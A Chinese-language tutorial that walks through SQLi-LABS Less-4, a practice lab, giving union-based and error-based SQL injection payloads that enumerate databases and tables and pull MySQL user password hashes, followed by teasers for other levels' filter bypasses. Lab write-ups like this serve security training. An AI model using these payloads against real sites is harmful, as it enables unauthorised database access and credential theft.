第四关是双引号+括号的字符型注入，推荐使用联合注入、报错注入

方式一：联合注入

参考文章：联合注入使用详解原理+步骤+实战教程

第一步、判断注入类型

地址栏输入 ?id=1") and 1 -- a，页面正常显示

地址栏输入 ?id=1") and 0 -- a，页面异常（空）显示

第二步、判断字段数

地址栏依次输入：

?id=1") order by 1 -- a

?id=1") order by 2 -- a

?id=1") order by 3 -- a

?id=1") order by 4 -- a

按照第4个字段排序时报错，确定返回结果的字段数为 3

第三步、判断显示位

地址栏输入 ?id=-1") union select 1,2,3 -- a

第四步、脱库

获取所有数据库，地址栏输入：

?id=-1") union select 1,(select group_concat(schema_name)from information_schema.schemata
),3 -- a

获取 security 库的所有表，地址栏输入：

?id=-1") union select 1,(select group_concat(table_name)from information_schema.tableswhere table_schema = 'security'
),3 -- a

获取 users 表的所有字段，地址栏输入：

?id=-1") union select 1,(select group_concat(column_name)from information_schema.columnswhere table_schema = 'security' and table_name = 'users'
),3 -- a

获取数据库用户的密码，地址栏输入：

?id=-1") union select 1,(select group_concat(user,password)from mysql.userwhere user='mituan'
),3 -- a

方式二：报错注入

参考文章：报错注入使用详解原理+步骤+实战教程

第一步、判断是否报错

地址栏输入 ?id=1"

页面显示数据库的报错信息，适合使用报错注入。

第二步、判断报错条件

地址栏输入 ?id=1") and updatexml(1,0x7e,3); -- a

页面正常显示报错信息，确定报错函数可以使用。

第三步、脱库

获取所有数据库，地址栏输入：

?id=1") and updatexml(1,concat(0x7e,substr((select group_concat(schema_name)from information_schema.schemata),33,31)
),3); -- a

获取 security 库的所有表，地址栏输入：

?id=1") and updatexml(1,concat(0x7e,substr((select group_concat(table_name)from information_schema.tableswhere table_schema='security'),1,31)
),3); -- a

获取 suers 表的所有字段，地址栏输入：

?id=1") and updatexml(1,concat(0x7e,substr((select group_concat(column_name)from information_schema.columnswhere table_schema='security' and table_name='users'),1,31)
),3); -- a

获取数据库用户的密码，地址栏输入：

?id=1") and updatexml(1,concat(0x7e,substr((select passwordfrom mysql.userwhere user='mituan'),1,31)
),3); -- a

推荐专栏

《网络安全快速入门》用最短的时间，掌握最核心的网络安全技术。

《靶场通关教程》各个靶场的通关教程，持续更新……

SQLi LABS Less-4 联合注入+报错注入相关推荐

SQLi LABS Less 27 联合注入+报错注入+布尔盲注+时间盲注
第27关是单引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 其他 SQLi LABS 靶场 ...
SQLi LABS Less 25 联合注入+报错注入+布尔盲注
第二十五关单引号字符型注入: 过滤了关键字(and.or),可以使用双写绕过: 这篇文章提供了联合注入.报错注入.布尔盲注三种解题方法. SQLi LABS 其余关卡可参考我的专栏:SQLi-LABS ...
SQLi LABS Less-26 联合注入+报错注入+布尔盲注+时间盲注
第26关是单引号字符型注入: 后台过滤了关键字( and or ),注释(/* # -- /),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 目录一.功能分析二 ...
SQL注入-盲注-时间注入-报错注入-布尔盲注-DNSlog注入-宽字节注入-WAF绕过-SqlMap使用
Sqli-labs的安装 1.安装WAMP http://www.wampserver.com/ WAMP是php + mysql + Apache环境集成工具 2.下载Sqli-labs https ...
SQLi LABS Less 23 联合注入+报错注入+布尔盲注
第23关是单引号字符型注入: 过滤了注释,使用闭合引号来绕过: 这篇文章提供联合注入.报错注入.布尔盲注三种解题方式. 一.功能分析这一关是一个简单的查询功能,在地址栏输入id,后台根据id查询数据 ...
SQLi LABS Less-11 联合注入+报错注入
第十一关是单引号字符型注入,推荐使用联合注入.报错注入方式一:联合注入参考文章:联合注入使用详解原理+步骤+实战教程第一步.判断注入类型用户名输入: a' or 1 -- a 密码随便输入: ...
SQLi LABS Less-12 联合注入+报错注入
第十二关是双引号+括号的字符型注入 , 推荐使用联合注入.报错注入. 方式一:联合注入参考文章:联合注入使用详解原理+步骤+实战教程第一步.判断注入类型用户名输入:a") or 1 ...
SQLi LABS Less-3 联合注入+报错注入
第三关是单引号+括号的字符型注入 ,推荐使用联合注入.报错注入. 方式一:联合注入推荐文章:联合注入使用详解,原理+步骤+实战教程第一步.判断注入点类型地址栏输入 ?id=1') and 1 - ...
SQLi Labs Less-1 联合注入+报错注入
第一关是单引号字符型注入,推荐使用联合注入.报错注入方式一:联合注入参考文章:联合注入使用详解,原理+步骤+实战案例第一步.判断注入点地址栏输入:?id=1' and 1 -- a,正常显示 ...

SQLi LABS Less-4 联合注入+报错注入